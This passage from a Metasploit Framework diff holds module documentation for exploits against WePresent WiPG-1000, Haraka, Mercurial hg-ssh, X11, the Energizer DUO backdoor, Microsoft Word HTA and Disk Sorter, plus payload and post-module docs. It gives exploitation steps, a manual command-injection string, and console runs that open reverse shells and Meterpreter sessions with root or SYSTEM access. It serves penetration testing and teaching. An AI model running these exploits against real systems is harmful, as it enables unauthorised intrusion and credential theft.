There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the `rdfs.cgi` file and whether it contains the string `https://www.redguard.ch/advisories/wepresent-wipg1000.txt`. All known versions of this file on the device are vulnerable to this command injection.
|
||||
|
||||
Manual exploitation would equate to browsing to the URI `http://<ip>/cgi-bin/rdfs.cgi` and entering the String `; command;` in the input field and submitting the form.
|
||||
|
||||
Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Make sure the device is running.
|
||||
2. Start msfconsole.
|
||||
3. Do: ```use exploit/linux/http/wipg1000_cmd_injection```
|
||||
4. Do: ```set payload cmd/unix/reverse_netcat```
|
||||
5. Do: ```set RHOST <ip>```
|
||||
6. Do: ```set LHOST <ip>```
|
||||
7. Do: ```exploit```
|
||||
8. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
**PAYLOAD**
|
||||
|
||||
The `generic`,`netcat` and `openssl` payload types are valid.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Firmware 2.0.0.7
|
||||
|
||||
The following is an example run getting a shell:
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/wipg1000_cmd_injection
|
||||
msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat
|
||||
payload => cmd/unix/reverse_netcat
|
||||
msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3
|
||||
RHOST => 192.168.3.3
|
||||
msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216
|
||||
LHOST => 192.168.3.216
|
||||
msf exploit(wipg1000_cmd_injection) > check
|
||||
[*] 192.168.3.3:80 The target appears to be vulnerable.
|
||||
msf exploit(wipg1000_cmd_injection) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.3.216:4444
|
||||
[*] Sending request
|
||||
[*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200
|
||||
id
|
||||
|
||||
uid=0(root) gid=0(root) groups=0(root),10(wheel)
|
||||
```
|
|
@ -0,0 +1,81 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar:
|
||||
|
||||
```
|
||||
#install nodejs and npm
|
||||
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
|
||||
sudo apt install nodejs
|
||||
|
||||
#Haraka setup
|
||||
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
|
||||
tar xvzf v2.8.8.tar.gz
|
||||
cd Haraka-2.8.8/
|
||||
npm install npm
|
||||
npm install
|
||||
|
||||
haraka -i haraka
|
||||
|
||||
cat << EOF > haraka/config/plugins
|
||||
access
|
||||
rcpt_to.in_host_list
|
||||
data.headers
|
||||
attachment
|
||||
test_queue
|
||||
max_unrecognized_commands
|
||||
EOF
|
||||
|
||||
echo haraka.test >> haraka/config/host_list
|
||||
|
||||
# Launch haraka as root
|
||||
sudo haraka -c haraka
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**from_email**
|
||||
|
||||
String used in the SMTP MAILFROM command
|
||||
|
||||
**to_email**
|
||||
|
||||
String used in the SMTP MAILTO command
|
||||
|
||||
**lhost**
|
||||
|
||||
The address to serve the payload from
|
||||
|
||||
**rhost**
|
||||
|
||||
The address or hostname to target
|
||||
|
||||
**payload**
|
||||
|
||||
Any compatible Metasploit payload
|
||||
|
||||
## Example Run
|
||||
|
||||
```
|
||||
msf > use exploit/linux/smtp/harakiri
|
||||
msf exploit(haraka) > set email_to root@haraka.test
|
||||
email_to => root@haraka.test
|
||||
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
|
||||
payload => linux/x64/meterpreter_reverse_http
|
||||
msf exploit(haraka) > run
|
||||
|
||||
[*] Started HTTP reverse handler on http://192.168.1.1:8080
|
||||
[*] Exploiting...
|
||||
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
|
||||
[*] Sending mail to target server...
|
||||
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
|
||||
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
|
||||
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
|
||||
[*] Command Stager progress - 100.00% done (120/120 bytes)
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit
|
||||
msf exploit(haraka) >
|
||||
```
|
|
@ -0,0 +1,53 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[mercurial](https://www.mercurial-scm.org/downloads).
|
||||
|
||||
This module was successfully tested against:
|
||||
|
||||
- Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
|
||||
|
||||
## Vulnerable Server Setup Steps
|
||||
|
||||
1. Install mercurial on your test server
|
||||
2. Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
|
||||
- Replace `if repo in allowed paths:` with `if True:`
|
||||
- Replace `cmd = ['-R', repo, 'serve', 'stdio']` with `cmd = ['-R', path, 'serve', 'stdio']`
|
||||
3. Setup a user with SSH pubkey auth
|
||||
4. Create a test repo in the users home directory and add a commit
|
||||
- `mkdir -p repos/repo1`
|
||||
- `cd repos/repo1`
|
||||
- `echo "hello world" > README`
|
||||
- `hg add README`
|
||||
- `hg commit -m "Adds README"`
|
||||
5. Restrict user in authorized_keys to hg-ssh binary only
|
||||
- `command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY`
|
||||
6. Verify SSH user can authenticate (should prompt and prevent a shell)
|
||||
- `ssh user@192.168.10.99`
|
||||
7. Verify SSH user commands are not allows (should prevent arbitrary commands)
|
||||
- `ssh user@192.168.10.99 ifconfig`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use exploit/linux/ssh/mercurial_ssh_exec`
|
||||
3. Do: `set RHOST <ip>`
|
||||
4. Do: `set LHOST <ip>`
|
||||
5. Do: `set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa`
|
||||
6. Do: `exploit`
|
||||
7. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
|
||||
|
||||
```
|
||||
msf exploit(mercurial_ssh_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.10.37:4444
|
||||
[*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
|
||||
[+] 192.168.10.99:22 - SSH connection is established.
|
||||
[+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
|
||||
[*] Sending stage (39842 bytes) to 192.168.10.99
|
||||
[*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400
|
||||
```
|
||||
|
|
@ -226,8 +226,8 @@ Of note, the user was given `manager-gui` permissions by default.
|
|||
HttpUsername => tomcat
|
||||
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
|
||||
HttpPassword => tomcat
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
|
||||
payload => linux/x86/mettle/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(tomcat_mgr_deploy) > set target 3
|
||||
|
@ -280,8 +280,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
|
|||
rport => 8087
|
||||
msf exploit(tomcat_mgr_deploy) > set target 3
|
||||
target => 3
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
|
||||
payload => linux/x86/mettle/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
|
||||
|
@ -342,8 +342,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
|
|||
rport => 8088
|
||||
msf exploit(tomcat_mgr_deploy) > set target 3
|
||||
target => 3
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
|
||||
payload => linux/x86/mettle/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
|
||||
|
|
|
@ -38,8 +38,8 @@ msf exploit(allwinner_backdoor) > set verbose true
|
|||
verbose => true
|
||||
msf exploit(allwinner_backdoor) > set session 1
|
||||
session => 1
|
||||
msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
|
||||
payload => linux/armle/mettle/reverse_tcp
|
||||
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
|
||||
payload => linux/armle/meterpreter/reverse_tcp
|
||||
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(allwinner_backdoor) > check
|
||||
|
|
|
@ -0,0 +1,137 @@
|
|||
## Vulnerable Application
|
||||
|
||||
X11 (X Window System) is a graphical windowing system most common on unix/linux.
|
||||
The service can accept connections from any users when misconfigured which is done with the command `xhost +`.
|
||||
|
||||
This exploit has been verified against:
|
||||
|
||||
1. Ubuntu 14.04
|
||||
2. Ubuntu 16.04
|
||||
3. Kali via Emulation method
|
||||
|
||||
This exploit does NOT work against:
|
||||
|
||||
1. Solaris 10 Java Desktop System (alt+F2 has no effect)
|
||||
|
||||
### Emulation
|
||||
|
||||
This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0`
|
||||
|
||||
### Ubuntu 12.04, 14.04
|
||||
|
||||
1. `sudo nano /etc/lightdm/lightdm.conf`
|
||||
2. Under the `[SeatDefaults]` area, add:
|
||||
|
||||
```
|
||||
xserver-allow-tcp=true
|
||||
allow-guest=true
|
||||
```
|
||||
|
||||
3. logout or reboot
|
||||
4. Verification: ```sudo netstat -antp | grep 6000```
|
||||
|
||||
```
|
||||
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
|
||||
```
|
||||
|
||||
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure X11
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/unix/x11/x11_keyboard_exec`
|
||||
4. Do: `set rhost [IPs]`
|
||||
5. Do: `set payload [payload]`
|
||||
6. Do: `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 14.04
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > run
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
|
||||
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400
|
||||
|
||||
id
|
||||
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
|
||||
cat /etc/*release
|
||||
DISTRIB_ID=Ubuntu
|
||||
DISTRIB_RELEASE=14.04
|
||||
DISTRIB_CODENAME=trusty
|
||||
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
|
||||
NAME="Ubuntu"
|
||||
VERSION="14.04.5 LTS, Trusty Tahr"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 14.04.5 LTS"
|
||||
VERSION_ID="14.04"
|
||||
```
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
|
||||
rhost => 192.168.2.26
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > exploit
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
|
||||
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400
|
||||
|
||||
id
|
||||
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
|
||||
cat /etc/*release
|
||||
DISTRIB_ID=Ubuntu
|
||||
DISTRIB_RELEASE=16.04
|
||||
DISTRIB_CODENAME=xenial
|
||||
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
|
||||
NAME="Ubuntu"
|
||||
VERSION="16.04.1 LTS (Xenial Xerus)"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 16.04.1 LTS"
|
||||
VERSION_ID="16.04"
|
||||
UBUNTU_CODENAME=xenial
|
||||
```
|
||||
|
||||
### Kali via Emulation
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
|
||||
rhost => 127.0.0.1
|
||||
msf exploit(x11_keyboard_exec) > run
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
|
||||
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400
|
||||
```
|
|
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
|
||||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
|
||||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
|
||||
|
||||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the vulnerable software
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
|
||||
4. Do: `set rhost`
|
||||
5. Do: `set payload`
|
||||
6. Do: `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the backdoor
|
||||
|
||||
```
|
||||
msf > use exploit/windows/backdoor/energizer_duo_payload
|
||||
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
|
||||
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
|
||||
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
|
||||
msf exploit(energizer_duo_payload) > exploit
|
||||
|
||||
[*] Started reverse handler on 192.168.0.228:4444
|
||||
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
|
||||
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
|
||||
[*] Sending stage (747008 bytes)
|
||||
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: XPDEV\Developer
|
||||
```
|
|
@ -0,0 +1,68 @@
|
|||
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
|
||||
|
||||
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
|
||||
|
||||
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
|
||||
- Windows Vista Service Pack 2
|
||||
- Windows Vista x64 Edition Service Pack 2
|
||||
- Windows 7 for 32-bit Systems Service Pack 1
|
||||
- Windows 7 for x64-based Systems Service Pack 1
|
||||
- Windows Server 2008 for 32-bit Systems Service Pack 2
|
||||
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
|
||||
- Windows Server 2008 for x64-based Systems Service Pack 2
|
||||
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
|
||||
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
|
||||
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
|
||||
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
|
||||
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
|
||||
- Windows Server 2012
|
||||
- Windows Server 2012 (Server Core installation)
|
||||
- Microsoft Office 2007 Service Pack 3
|
||||
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
|
||||
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
|
||||
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
|
||||
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
|
||||
- Microsoft Office 2016 (32-bit edition)
|
||||
- Microsoft Office 2016 (64-bit edition)
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/windows/fileformat/office_word_hta```
|
||||
3. Do: ```set payload [PAYLOAD NAME]```
|
||||
3. Do: ```exploit```
|
||||
|
||||
## Demo
|
||||
|
||||
```
|
||||
$ msfconsole
|
||||
msf > use exploit/windows/fileformat/office_word_hta
|
||||
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(office_word_hta) > set lhost 192.168.146.1
|
||||
lhost => 192.168.146.1
|
||||
msf exploit(office_word_hta) > set srvhost 192.168.146.1
|
||||
srvhost => 192.168.146.1
|
||||
msf exploit(office_word_hta) > run
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.146.1:4444
|
||||
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
|
||||
[*] Using URL: http://192.168.146.1:8080/default.hta
|
||||
[*] Server started.
|
||||
```
|
||||
|
||||
After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
|
||||
and open it with Microsoft Office Word. You should receive a session:
|
||||
|
||||
```
|
||||
[*] Sending stage (957487 bytes) to 192.168.146.145
|
||||
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
|
||||
```
|
||||
|
|
@ -0,0 +1,73 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Disk Sorter Enterprise](http://www.disksorter.com) versions up to v9.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/5ffae2c1a4b2165e0dd2a8e37765ef0e-disksorterent_setup_v9.5.12.exe).
|
||||
|
||||
## Verification Steps
|
||||
1. Install a vulnerable Disk Sorter Enterprise
|
||||
2. Start `Disk Sorter Enterprise` service
|
||||
3. Start `Disk Sorter Enterprise` client application
|
||||
4. Navigate to `Tools` > `Disk Sorter Options` > `Server`
|
||||
5. Check `Enable Web Server On Port 80` to start the web interface
|
||||
6. Start `msfconsole`
|
||||
7. Do `use exploit/windows/http/disksorter_bof`
|
||||
8. Do `set RHOST ip`
|
||||
9. Do `check`
|
||||
10. Verify the target is vulnerable
|
||||
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
|
||||
12. Do `set LHOST ip`
|
||||
13. Do `exploit`
|
||||
14. Verify the Meterpreter session is opened
|
||||
|
||||
## Scenarios
|
||||
|
||||
###Disk Sorter Enterprise v9.5.12 on Windows 7 SP1
|
||||
|
||||
```
|
||||
msf exploit(disksorter_bof) > show options
|
||||
|
||||
Module options (exploit/windows/http/disksorter_bof):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOST 172.16.0.9 yes The target address
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (windows/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 172.16.0.20 yes The listen address
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Disk Sorter Enterprise v9.5.15
|
||||
|
||||
|
||||
msf exploit(disksorter_bof) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.0.20:4444
|
||||
[*] Sending request...
|
||||
[*] Sending stage (957487 bytes) to 172.16.0.9
|
||||
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.9:59371) at 2017-04-24 14:46:52 +0100
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : PC
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x86
|
||||
System Language : pt_PT
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -1,4 +1,4 @@
|
|||
linux/x86/meterpreter/reverse_tcp is the most pouplar payload against the Linux platform. It allows
|
||||
linux/x86/meterpreter/reverse_tcp is the most popular payload against the Linux platform. It allows
|
||||
you to remotely take over the compromised system, having control of the file system, collect
|
||||
sensitive information such as credentials using post modules, etc.
|
||||
|
||||
|
@ -209,7 +209,7 @@ meterpreter > help
|
|||
|
||||
## Using a Post module
|
||||
|
||||
One of the best things about Meterprter is you have access to a variety of post modules that
|
||||
One of the best things about Meterpreter is you have access to a variety of post modules that
|
||||
"shell" sessions might not have. Post modules provide you with more capabilities to collect data
|
||||
from the remote machine automatically. For example, stealing credentials from the system or
|
||||
third-party applications, or modify settings, etc.
|
||||
|
|
|
@ -0,0 +1,46 @@
|
|||
A basic fuzzer for CAN IDs. It can scan through CAN IDs and probes each data section
|
||||
with a set value. The defualt is 0xFF. It can also iterate through all the possible
|
||||
values for each byte as well. It has no concept of what is going on and makes no
|
||||
attempt to check for return packets.
|
||||
|
||||
## Options
|
||||
|
||||
**STARTID**
|
||||
|
||||
The CAN ID to start your scan from.
|
||||
|
||||
**STOPID**
|
||||
|
||||
The CAN ID to stop the CAN scan. If no STOPID is specified it will only scan one ID (STARTID).
|
||||
|
||||
**FUZZ**
|
||||
|
||||
If true the data segment will iterate through all possiblities (0-255).
|
||||
|
||||
**PROBEVALUE**
|
||||
|
||||
The value to put at each data segment. The default is 0xFF. When Fuzz is enabled this value is ignored.
|
||||
|
||||
**PADDING**
|
||||
|
||||
If you need to pad out the packet to be 8 packets for each request you can set this value to something between 0-255.
|
||||
|
||||
**CANBUS**
|
||||
|
||||
The bus to scan. See 'supported_buses' for a list of available buses.
|
||||
|
||||
## Scenarios
|
||||
|
||||
To quickly test how a vehicle or ECU reacts to random data throughout the packet. For instance, you
|
||||
have identified some door controls using a certain CAN ID. By probing the other values you can often identify
|
||||
other door related functions.
|
||||
|
||||
Note: This is not a scanner. You would not want to run this against all the IDs in a car and expect (good) results.
|
||||
|
||||
```
|
||||
hwbridge > run post/hardware/automotive/canprobe CANBUS=can0 STARTID=0x320 fuzz=true
|
||||
|
||||
[*] Probing 0x320...
|
||||
[*] Probe Complete
|
||||
|
||||
```
|
|
@ -0,0 +1,68 @@
|
|||
This module allows you to upload a binary file, and automatically execute it.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The following platforms are supported:
|
||||
|
||||
|
||||
* Windows
|
||||
* Linux
|
||||
* OS X
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Prepare for an executable file you wish to upload and execute.
|
||||
2. Obtain a session from the target machine.
|
||||
3. In msfconsole, do ```use post/multi/manage/upload_exec```
|
||||
4. Set the ```LFILE``` option
|
||||
5. Set the ```RFILE``` option
|
||||
6. Set the ```SESSION``` option
|
||||
7. ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**LFILE**
|
||||
|
||||
The file on your machine that you want to upload to the target machine.
|
||||
|
||||
**RFILE**
|
||||
|
||||
The file path on the target machine. This defaults to LFILE.
|
||||
|
||||
## Demo
|
||||
|
||||
```
|
||||
msf > use post/multi/manage/upload_exec
|
||||
msf post(upload_exec) > show options
|
||||
|
||||
Module options (post/multi/manage/upload_exec):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LFILE yes Local file to upload and execute
|
||||
RFILE no Name of file on target (default is basename of LFILE)
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
msf post(upload_exec) > set lfile /tmp/
|
||||
lfile => /tmp/
|
||||
msf post(upload_exec) > set lfile /tmp/msg.exe
|
||||
lfile => /tmp/msg.exe
|
||||
msf post(upload_exec) > set rfile C:\\Users\\sinn3r\\Desktop\\msg.exe
|
||||
rfile => C:\Users\sinn3r\Desktop\msg.exe
|
||||
msf post(upload_exec) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
1 meterpreter x86/windows WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM 192.168.146.1:4444 -> 192.168.146.149:50168 (192.168.146.149)
|
||||
|
||||
msf post(upload_exec) > set session 1
|
||||
session => 1
|
||||
|
||||
msf post(upload_exec) > run
|
||||
|
||||
[-] Post interrupted by the console user
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.14.15"
|
||||
VERSION = "4.14.17"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -10,7 +10,7 @@ module Sessions
|
|||
# This class creates a platform-specific meterpreter session type
|
||||
#
|
||||
###
|
||||
class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter
|
||||
class Meterpreter_x64_Linux < Msf::Sessions::Meterpreter
|
||||
def supports_ssl?
|
||||
